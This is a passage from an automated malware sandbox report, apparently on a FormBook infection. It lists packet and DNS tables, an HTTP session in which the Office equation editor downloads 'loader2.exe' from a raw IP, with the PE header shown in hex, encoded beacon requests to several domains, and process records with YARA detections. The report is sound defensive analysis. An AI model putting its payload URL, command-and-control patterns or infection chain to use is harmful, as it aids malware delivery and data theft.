                                                                                                                                                                                          Jun 11, 2021 08:06:48.665532112 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.665550947 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.665566921 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.666445017 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866069078 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866101027 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866115093 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866130114 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866147995 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866163969 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866182089 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866197109 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866214037 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866235971 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866259098 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866277933 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866306067 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.866334915 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:48.869468927 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071228027 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071257114 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071274042 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071290016 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071299076 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071307898 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071325064 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071330070 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071331024 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071336985 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071351051 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071367979 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071377039 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071384907 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071396112 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071403027 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071410894 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071422100 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071439028 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071455002 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071455002 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071460962 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071464062 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071475029 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071479082 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071494102 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071496010 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071511030 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071513891 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071528912 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071532011 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071547985 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071548939 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071563959 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071568966 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071580887 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071583033 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071604013 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.071616888 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.074109077 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269433975 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269471884 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269484997 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269503117 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269519091 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269535065 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269551039 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269567013 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269583941 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269606113 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269623995 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269639969 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269658089 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269659042 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269675016 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269685030 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269692898 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269702911 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269710064 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269721031 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269727945 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269740105 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269748926 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269754887 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269768953 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269784927 CEST4916580192.168.2.22192.210.173.40

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Jun 11, 2021 08:08:11.429814100 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:11.495436907 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:08:17.104280949 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:17.169647932 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:08:22.954375029 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:23.290237904 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:08:24.818254948 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:24.879548073 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:08:24.880181074 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:25.288223028 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:08:25.288955927 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:25.352297068 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:08:29.375241041 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:29.454852104 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:08:34.719614983 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                          Jun 11, 2021 08:08:34.816056967 CEST53556278.8.8.8192.168.2.22

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                          Jun 11, 2021 08:08:11.429814100 CEST192.168.2.228.8.8.80x708cStandard query (0)www.alberthospice.comA (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:17.104280949 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.meganfantastic.comA (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:22.954375029 CEST192.168.2.228.8.8.80xccffStandard query (0)www.adultvideolife.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:24.818254948 CEST192.168.2.228.8.8.80x379fStandard query (0)www.adultvideolife.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:24.880181074 CEST192.168.2.228.8.8.80x379fStandard query (0)www.adultvideolife.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:25.288955927 CEST192.168.2.228.8.8.80x379fStandard query (0)www.adultvideolife.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:29.375241041 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.sciencebasedmasks.comA (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:34.719614983 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.obi4ex.comA (IP address)IN (0x0001)

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                          Jun 11, 2021 08:08:11.495436907 CEST8.8.8.8192.168.2.220x708cNo error (0)www.alberthospice.com154.84.76.49A (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:17.169647932 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.meganfantastic.com45.195.169.197A (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:23.290237904 CEST8.8.8.8192.168.2.220xccffNo error (0)www.adultvideolife.xyz127.0.0.1A (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:24.879548073 CEST8.8.8.8192.168.2.220x379fNo error (0)www.adultvideolife.xyz127.0.0.1A (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:25.288223028 CEST8.8.8.8192.168.2.220x379fNo error (0)www.adultvideolife.xyz127.0.0.1A (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:25.352297068 CEST8.8.8.8192.168.2.220x379fNo error (0)www.adultvideolife.xyz127.0.0.1A (IP address)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:29.454852104 CEST8.8.8.8192.168.2.220x2e78No error (0)www.sciencebasedmasks.comwww.sciencebasedmasks.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                          Jun 11, 2021 08:08:34.816056967 CEST8.8.8.8192.168.2.220x2f03Server failure (2)www.obi4ex.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • 192.210.173.40
                                                                                                                                                                                          • www.alberthospice.com
                                                                                                                                                                                          • www.meganfantastic.com

                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          0192.168.2.2249165192.210.173.4080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Jun 11, 2021 08:06:48.269107103 CEST0OUTGET /files/loader2.exe HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                          Host: 192.210.173.40
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Jun 11, 2021 08:06:48.467674017 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Fri, 11 Jun 2021 06:06:46 GMT
                                                                                                                                                                                          Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                                                                                                                                          Last-Modified: Thu, 10 Jun 2021 15:52:54 GMT
                                                                                                                                                                                          ETag: "36dc6-5c46b6262be11"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Content-Length: 224710
                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK\<2p@sp.textZZ\ `.rdatap`@@.datar@.ndata@.rsrcv@@


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          1192.168.2.2249166154.84.76.4980C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Jun 11, 2021 08:08:11.805231094 CEST237OUTGET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1
                                                                                                                                                                                          Host: www.alberthospice.com
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Jun 11, 2021 08:08:12.100292921 CEST237INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Fri, 11 Jun 2021 06:08:11 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Upgrade: h2
                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 1.0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          2192.168.2.224916745.195.169.19780C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Jun 11, 2021 08:08:17.470237970 CEST238OUTGET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1
                                                                                                                                                                                          Host: www.meganfantastic.com
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          Jun 11, 2021 08:08:17.780684948 CEST239INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                          Date: Fri, 11 Jun 2021 06:08:17 GMT
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 479
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          ETag: "6080f05e-1df"
                                                                                                                                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                          Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          Analysis Process: EXCEL.EXE PID: 2508 Parent PID: 584

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:08:06:39
                                                                                                                                                                                          Start date:11/06/2021
                                                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                          Imagebase:0x13fc60000
                                                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Analysis Process: EQNEDT32.EXE PID: 2596 Parent PID: 584

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:08:07:01
                                                                                                                                                                                          Start date:11/06/2021
                                                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:543304 bytes
                                                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                          Analysis Process: vbc.exe PID: 2844 Parent PID: 2596

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:08:07:04
                                                                                                                                                                                          Start date:11/06/2021
                                                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:224710 bytes
                                                                                                                                                                                          MD5 hash:8C35AC8D43F7E59105902FA16114144E
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                          • Detection: 23%, Metadefender, Browse
                                                                                                                                                                                          • Detection: 41%, ReversingLabs
                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                          Analysis Process: vbc.exe PID: 2888 Parent PID: 2844

                                                                                                                                                                                          General

                                                                                                                                                                                          Start time:08:07:05
                                                                                                                                                                                          Start date:11/06/2021
                                                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          File size:224710 bytes
                                                                                                                                                                                          MD5 hash:8C35AC8D43F7E59105902FA16114144E
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
